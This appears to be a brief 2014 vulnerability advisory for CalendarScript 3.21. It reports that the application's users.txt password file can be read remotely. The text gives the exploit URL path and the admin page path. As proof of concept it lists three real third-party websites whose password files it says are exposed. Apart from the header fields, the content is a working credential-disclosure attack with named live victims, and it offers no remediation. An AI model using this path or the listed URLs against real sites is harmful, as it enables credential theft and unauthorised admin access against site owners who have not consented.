CalendarScript version 3.2.1 suffers from a remote password disclosure vulnerability. Note that this finding houses site-specific data.
2e13799d7288e78b76f6fa3dbafdf7e565429515f7fc0f98fd86950948824f2d
[+] Password Disclosure on CalendarScript 3.21
[+] Date: 28/04/2014
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.calendarscript.com/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: users.txt
[+] Version: 3.21
[+] Exploit : http://host/calendar/calendarscript/users.txt
[+] PoC: http://www.kcreggae.org/Calendar/calendarscript/users.txt
http://fangmichael.com/cgi-bin/calendar/calendarscript/users.txt
http://www.theoldironsides.com/calendar/calendarscript/users.txt
[+] Admin page: http://host/calendar/calendar_admin.pl